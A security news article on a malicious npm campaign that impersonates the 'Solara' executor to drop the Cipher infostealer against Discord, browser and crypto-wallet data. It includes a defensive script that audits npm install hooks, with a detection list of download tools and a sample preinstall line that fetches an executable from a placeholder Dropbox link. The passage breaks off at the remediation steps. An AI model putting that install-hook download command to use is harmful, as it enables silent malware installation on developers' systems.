Malicious npm Campaign Impersonates Solara Executor to Steal Discord and Crypto Wallet Data
On March 12, 2026, JFrog security researchers Guy Korolevski and Meitar Palas reported the discovery of two malicious packages designed to deliver the Cipher infostealer.
By masquerading as a Roblox script executor named “Solara,” the malware targets Windows environments to quietly harvest Discord credentials, browser data, and cryptocurrency wallets.
The campaign relied on two npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, which have since been removed.
These packages used npm pre-install scripts to download a Windows executable from Dropbox. When uploaded to VirusTotal, the executable evaded almost all static and heuristic antivirus scanners because it functioned only as a dropper and carried no malicious logic of its own.
Inside, the dropper concealed a 321 MB archive containing obfuscated JavaScript, a full Node.js runtime, and an embedded Python script.
By avoiding traditional malware signatures and hiding the true payload inside a clean outer layer, the attackers successfully evaded immediate detection.
The payload also included elevate.exe, a legitimate tool that could be abused to execute commands with higher system privileges.
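The delivery technique above (an npm lifecycle hook that fetches and runs a binary at install time) is something a defender can check for before `npm install` ever runs the hook. The following is an added example, not code from the JFrog report or from the packages themselves: it reads a package manifest and flags install-time scripts that download remote content or reference Windows executables. The sample manifests are constructed; the script bodies are illustrative and not the real ones.

```javascript
// Added example (not from the JFrog report): audit npm lifecycle hooks for
// install-time download-and-execute behaviour.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators a defender would treat as suspicious inside an install hook.
// The hosting-domain list is illustrative (constructed), not exhaustive.
const FETCH_PATTERNS = [
  /\bcurl\b/i, /\bwget\b/i, /Invoke-WebRequest/i, /\biwr\b/i,
  /DownloadFile|DownloadString/i, /\bpowershell\b/i, /\bcertutil\b/i,
  /\bnode\s+-e\b/i,
  /https?:\/\/[^\s'"]*(dropbox\.com|raw\.githubusercontent\.com)/i,
];
const EXEC_EXTENSIONS = /\.(exe|msi|bat|ps1|scr)\b/i;

// Returns one finding per suspicious hook: { hook, command, reasons }.
// An empty array means no lifecycle hook matched any indicator.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const reasons = [];
    for (const re of FETCH_PATTERNS) if (re.test(cmd)) reasons.push(re.source);
    if (EXEC_EXTENSIONS.test(cmd)) reasons.push("references a Windows executable");
    if (reasons.length) findings.push({ hook, command: cmd, reasons });
  }
  return findings;
}

// Constructed sample manifests. The package name is one of the two from the
// report; the preinstall body is illustrative, not the real script.
const SAMPLE_MALICIOUS = {
  name: "bluelite-bot-manager",
  version: "1.0.0",
  scripts: {
    preinstall: "powershell -c \"Invoke-WebRequest https://www.dropbox.com/s/EXAMPLE/setup.exe -OutFile setup.exe\"",
  },
};
const SAMPLE_BENIGN = {
  name: "some-lib",
  version: "2.1.0",
  scripts: { postinstall: "node scripts/build-native.js", test: "jest" },
};

for (const pkg of [SAMPLE_MALICIOUS, SAMPLE_BENIGN]) {
  console.log(pkg.name, JSON.stringify(auditLifecycleScripts(pkg), null, 2));
}
```

Run it against each `package.json` under `node_modules` after an install with `npm config set ignore-scripts true`, so hooks are inspected before they are ever allowed to execute.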
The Cipher stealer prioritizes compromising Discord accounts by disabling built-in security features and modifying client files.
The malware patches BetterDiscord’s core files to neutralize webhook protections, ensuring that stolen credentials reach the attacker’s server without being blocked.
For the official Discord app, the JavaScript downloads an additional payload from a live GitHub repository.
The injected script forces users to log out, subsequently capturing their credentials, two-factor authentication codes, and credit card details upon their next login.
To maintain persistence, the malware modifies Discord’s installation files, ensuring the malicious script runs automatically every time the application launches.
Browser and Crypto Wallet Theft
Beyond Discord, the malware conducts a broad sweep of the victim's system for sensitive data. If Python is not installed, the malware silently downloads and installs it so that the Python-based collection routine can run.
It accesses local databases for Chrome, Edge, Brave, Opera, and Yandex to steal passwords, cookies, autofill data, and browsing history, as reported by JFrog.
Simultaneously, the script hunts for wallet files associated with Bitcoin, Ethereum, Exodus, Electrum, and several other digital currencies.
The malware actively attempts to decrypt Exodus wallet seed files using local libraries. All collected data is then moved to a temporary staging directory, compressed into a ZIP file, and exfiltrated to the attacker via file-sharing services or a command-and-control server.
While the npm packages and Dropbox links have been neutralized, users who may have been exposed should take immediate remediation steps: